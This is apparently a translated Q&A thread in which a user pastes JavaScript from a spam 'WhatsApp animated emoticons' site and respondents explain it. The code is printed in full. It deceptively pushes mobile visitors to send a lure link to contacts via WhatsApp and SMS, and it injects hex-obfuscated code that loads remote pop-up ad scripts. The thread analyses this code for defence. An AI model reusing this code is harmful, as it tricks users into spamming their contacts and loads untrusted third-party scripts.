恶意网站:decyphering代码?

时间:2015-11-15 18:08:06

标签: javascript html spam malware

所以这是一个恶意网站,试图让人们进一步传播他们的网站,这也会导致广告 - 我建议启用noscript。
http://trucchiios.com/emoticon/index_en.php
现在我在这里按下大whatsapp按钮时会执行代码,但是它有什么作用? 

c = 0;
var image;

function fn1(x)
{
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // some code..
        ++c;
        if (c <= 6)
        {
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            if (c == 2) {
                ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
            } else if (c == 4) {
                ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
            }
        } else if (c <= 10) {
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            if (c == 7) {
                ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
            }
            var head = document.getElementsByTagName('head').item(0);
            var _0xc631 = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x73\x2E\x73\x70\x72\x69\x6E\x74\x72\x61\x64\x65\x2E\x63\x6F\x6D\x2F\x61\x64\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70\x3F\x70\x69\x64\x3D\x38\x36\x37\x33\x26\x6F\x72\x64\x3D\x5B\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x5D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
            var script = document[_0xc631[1]](_0xc631[0]);
            script[_0xc631[2]] = _0xc631[3];
            script[_0xc631[4]] = _0xc631[5];
            head[_0xc631[6]](script);
        } else
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}

function fn3(x) {
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // some code..
        ++c;
        if (c <= 10) {
            window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
        } else
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}

function fn2(x) {
    if (c >= 10)
    {
        window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else
    {
        window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited  " + c + " contacts.");
    }
}
var n = 300,
    t = setInterval(function() {
        $("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
    }, 1e3);

我希望有人告诉我它的作用。我怀疑它只是一个adspam,而不是真正的恶意软件,但请看一下。

3 个答案:

答案 0 :(得分:2)

它添加了javascript文件:http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]

完整代码:

var _0xc631 = ["script", "createElement", "type", "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]", "appendChild"]    
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);

“正常”代码:

var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]";
head.appendChild(script);

网页.../adscript.php?pid=8673&ord=[timestamp],使用缓存标题仅显示一次。在第一个视图中,您得到:

 if(typeof(document.asm_excl) == "undefined"){ document.asm_excl = new Array(); } document.asm_excl = document.asm_excl.concat(String("").split("|")); if(typeof(document.asm_max_2398) == "undefined"){ document.asm_max_2398 = 1; }
 else{ document.asm_max_2398++; }

 var asm_ex = false;
 var asm_ex_all = false;
 for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "2398"){asm_ex = true; break;}}
 for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "w21272" || document.asm_excl[asm_i] == "p8673"){asm_ex_all = true; break;}}
 if(asm_ex_all){}
 else if(!asm_ex  && document.asm_max_2398 <= 1)
 {
   document.write(''); 
(function ()
 {
  var s, r, t;
  r = false;
  s = document.createElement("script");
  s.type = "text/javascript";
  s.src = "http://cdn.adspirit.de/banner/asmpop_async.js";
  s.readySet = false;
  s.onload = function (){if(!this.readySet){this.readySet=true;asm_pop_asmfls8673x5396511y1447611443();}};
  s.onreadystatechange = function (){if ( !this.readySet && (!this.readyState || this.readyState == "complete")){this.readySet=true; asm_pop_asmfls8673x5396511y1447611443();}};
  function asm_pop_asmfls8673x5396511y1447611443()
  {
   r = true;
   var asm_pop_options = new Object()
   asm_pop_options.url = "http://ads.sprintrade.com/adpop.php?tz=1447611443715312&pid=8673&kid=2398&wmid=28565&wsid=21272&uid=9&ord=%5Btimestamp%5D&wpcn=asmpvx8547661447611443";
   asm_pop_options.breite = "1920";
   asm_pop_options.hoehe = "1080";
   asm_pop_options.links = "0";
   asm_pop_options.oben = "0";
   asm_pop_options.ops = "alwaysLowered=0,alwaysRaised=1,dependent=0,fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=1,status=0,titlebar=0,toolbar=0,disableFullscreen=0,disableClose=0,disableBorder=0";
   asm_pop_options.layeronly = false;
   asm_pop_options.popunder = false;
   asm_pop_options.canlayer = false;
   asm_pop_options.clickpop = true;
   asm_pop_options.close = "0";
   asm_pop_options.booLoad = true;
   asm_pop_options.loadTime = "2";
   asm_pop_options.closeTime = "0";
   asm_pop_options.cookdom = "sprintrade.com";
   asm_pop_options.poptitle = "";
   asm_pop_options.popdomain = "http://cdn.adspirit.de";
   asm_pop_options.kid = "2398";
   asm_pop_options.pid = "8673";
   asm_pop_options.id = "asmfls8673x5396511y1447611443";
   window.asm_pop_asmfls8673x5396511y1447611443 = new asm_popup(asm_pop_options);
  }
  var ss = document.getElementsByTagName("script");
  if(ss.length>0){ ss[ss.length-1].parentNode.insertBefore(s, ss[ss.length-1].nextSibling); }
  else if(document.body){document.body.appendChild(s);}
 })()
   document.write(''); 

 }
 else
 {
  document.write('<scr'+'ipt type="text\/javasc'+'ript" language="JavaSc'+'ript" src="http://ads.sprintrade.com/adscript.php?pid=8673&hr=1&nrc=1&&wpcn=asmpvx8547661447611443&ex=|2398&ord='+(new Date()).getTime()+'"><\/scr'+'ipt>');
 }

获得后:

 document.write('');

脚本使只运行一次

答案 1 :(得分:2)

这段代码似乎对上周收到的垃圾邮件数量增加负有责任。我很确定这段代码是使用Whatsapp web发送到恶意网站的链接:

window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");

如果使用移动设备,

if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {

还尝试发送短信:

"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");

执行此代码时会加载其他一些addware网站。这段代码似乎执行了一些其他任务,但很难知道。该脚本使用Javascript编写。

答案 2 :(得分:1)

语言是Javascript。

这些与mailto:链接(调用电子邮件的默认应用程序)非常相似,但在这种情况下,它会调用默认的WhatsApp应用程序或SMS应用程序(取决于操作系统),然后发送宣传广告。

%0D%0ACRLF

的unescape编码字符串

但话又说回来,如果你说它是一个很大的“WhatsApp”按钮,你期望它做什么?

相关问题
最新问题